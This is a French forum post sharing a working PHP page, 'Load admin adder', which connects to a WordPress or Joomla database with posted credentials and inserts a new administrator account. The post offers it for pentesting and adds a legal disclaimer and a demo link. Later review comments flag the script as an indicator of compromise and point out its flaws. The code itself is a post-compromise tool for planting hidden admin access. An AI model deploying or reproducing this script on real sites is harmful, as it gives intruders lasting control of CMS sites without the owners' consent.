Voilà un petit script utile à tous pour vos tests personnels ou de pentest
=>
Code :
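<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Load admin adder</title>
  <style>
    /* Page background and base font. The original selector list also named
       "root", which matches no HTML element, so only body is kept. */
    body {
      background: #3D3D3D;
      font-family: sans-serif;
      margin: 0;
      padding: 0;
    }
    /* Centred panel that holds the form. */
    #main {
      width: 300px;
      margin: 100px auto;
      background: blue;
      padding: 3px;
      padding-bottom: 0px;
      border-radius: 5px;
    }
    input {
      border: 1px solid grey;
      background: #ECECEC;
      border-radius: 2px;
    }
    h1 {
      color: #ECECEC;
      text-align: center;
      /* Was written "margin:top", which browsers discard as an invalid declaration. */
      margin-top: -5px;
    }
    /* Thin light bar across the top of the page. */
    #top {
      height: 5px;
      background: #ECECEC;
      margin: 0;
    }
    .logo { text-align: center; }
    /* Status lines printed by the PHP handler. */
    .failed { text-align: center; color: red; }
    .success { text-align: center; color: green; }
  </style>
</head>
<body>
<!-- The logo used to sit inside <head>; flow content there forces the parser
     to close <head> early, so it now opens the body instead. -->
<div class="logo"><img src="http://n-pn.fr/images/logo.png" alt="Logo"></div>
<div id="top"></div>
<h1>Load Admin Account </h1>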
<?php
// Handles the form POST: connects to the MySQL server named in the request and
// inserts a new user row, then a second row that ties that user to an
// administrative role or group, in a WordPress or Joomla database.
//
// NOTE(review): nothing in this file authenticates the caller. Anyone who can
// reach the script can drive it with any database credentials they hold, so it
// should never stay on a reachable web root. Finding this file on a server
// where nobody deployed it on purpose is an indicator of compromise.
// NOTE(review): the mysql_* extension was removed in PHP 7.0, so this block
// only runs on older PHP versions.
//
// Only 'dbhost' is tested with isset(); the other keys are tested for
// truthiness, so a missing key raises a notice and an empty value (for example
// an empty database password) skips the whole block. 'dbname' is used below
// but is not part of this check.
if(isset($_POST['dbhost'])&&($_POST['dbuser'])&&($_POST['dbpass'])&&($_POST['user'])&&($_POST['pass'])&&($_POST['type'])&&($_POST['dbprefix'])){
// Host, user, password and database name are taken straight from the request.
mysql_connect($_POST['dbhost'], $_POST['dbuser'], $_POST['dbpass'])or die("<p class='failed'>Databse error</p>");
mysql_select_db($_POST['dbname'])or die("<p class='failed'>Databse error</p>");
switch($_POST['type']){
case 'wordpress':
// Positional VALUES list: depends on the column order of the installed schema
// (TODO confirm against the target version). The password is stored as a plain
// md5() digest. The values 'eduard' and 'eduard@gmail.com' are hard-coded, so
// every account created by this script carries them; defenders can search the
// users table for them.
// On failure the mysql_error() text is printed into the page without HTML
// escaping (same pattern on every query below).
// This first INSERT names the literal table wp_users, while the two statements
// after it build the table name from the posted prefix.
mysql_query("INSERT INTO wp_users VALUES('', '".mysql_real_escape_string($_POST['user'])."', '".md5($_POST['pass'])."', 'eduard', 'eduard@gmail.com', '', '', '', '0', 'eduard')")or die("<p class='failed'>".mysql_error()."</p>");
// Look the new row's id up again by login name.
// NOTE(review): the prefix is escaped but concatenated as an unquoted
// identifier; escaping quote characters does not restrict it to a valid table
// name.
$id = mysql_result(mysql_query("SELECT id FROM ".mysql_real_escape_string($_POST['dbprefix'])."users WHERE user_login = '".mysql_real_escape_string($_POST['user'])."' "), 0);
// Attach a serialized capabilities array that marks the user as administrator.
mysql_query("INSERT INTO ".mysql_real_escape_string($_POST['dbprefix'])."usermeta VALUES('', '".$id."', 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}') ")or die("<p class='failed'>".mysql_error()."</p>");
echo'<p class="success">Account added with success</p>';
break;
case 'joomla':
// Same approach for Joomla: positional INSERT with the hard-coded name
// 'eduard' and e-mail 'eduard@gmail.com', password stored as a plain md5()
// digest. Column order is assumed to match the installed schema (TODO confirm).
mysql_query("INSERT INTO ".mysql_real_escape_string($_POST['dbprefix'])."users VALUES('', 'eduard', '".mysql_real_escape_string($_POST['user'])."', 'eduard@gmail.com', '".md5($_POST['pass'])."', 'deprecated', 0, 1, '', '', 0, 0)")or die("<p class='failed'>".mysql_error()."</p>");
// Look the new row's id up again by username.
$id = mysql_result(mysql_query("SELECT id FROM ".mysql_real_escape_string($_POST['dbprefix'])."users WHERE username='".mysql_real_escape_string($_POST['user'])."' "), 0);
// Map the user to group id 8 (presumably Super Users in a default Joomla
// install; verify against the target's usergroups table).
mysql_query("INSERT INTO ".mysql_real_escape_string($_POST['dbprefix'])."user_usergroup_map VALUES('".$id."', 8 ) ")or die("<p class='failed'>".mysql_error()."</p>");
echo'<p class="success">Account added with success</p>';
break;
}
}?>
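<div id="main">
<!-- Posts back to this same script. The form has no access control of its
     own: restrict the page at the web-server level, serve it over HTTPS only
     (the database password travels in the request body), and delete the file
     once the test is finished. -->
<form method="post" action="">
  <table role="presentation">
    <tr>
      <td><label for="type">CMS :</label></td>
      <td>
        <select id="type" name="type">
          <option value="wordpress">WordPress</option>
          <option value="joomla">Joomla</option>
        </select>
      </td>
    </tr>
    <tr>
      <td><label for="dbhost">Db Host:</label></td>
      <td><input type="text" id="dbhost" name="dbhost"></td>
    </tr>
    <tr>
      <td><label for="dbuser">Db User:</label></td>
      <td><input type="text" id="dbuser" name="dbuser"></td>
    </tr>
    <tr>
      <td><label for="dbpass">Db Pass:</label></td>
      <!-- Masked and kept out of browser form history; it was a plain text field. -->
      <td><input type="password" id="dbpass" name="dbpass" autocomplete="off"></td>
    </tr>
    <tr>
      <td><label for="dbname">Db Name:</label></td>
      <td><input type="text" id="dbname" name="dbname"></td>
    </tr>
    <tr>
      <td><label for="dbprefix">Db prefix:</label></td>
      <td><input type="text" id="dbprefix" name="dbprefix"></td>
    </tr>
    <tr>
      <td><label for="user">Login:</label></td>
      <td><input type="text" id="user" name="user"></td>
    </tr>
    <tr>
      <td><label for="pass">Password:</label></td>
      <td><input type="password" id="pass" name="pass" autocomplete="new-password"></td>
    </tr>
    <tr>
      <td colspan="2" style="text-align: center"><input type="submit"></td>
    </tr>
  </table>
</form>
</div>
</body>
</html>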
<link rel="stylesheet" media="screen" type="text/css" title="design_encoder" href="style.css" />
<br/><br/>
<fieldset>
<legend>REMARQUE :</legend>
<p>Contenu : Vous devez impérativement avoir les droits du propriétaire pour utiliser ceci, sinon vous serez en délit. Nous ne couvrons pas vos actes.</p>
</fieldset><br/><br/><br/>
LIVE DEMO :
http://french-dump.comoj.com/adder.php
Cordialement,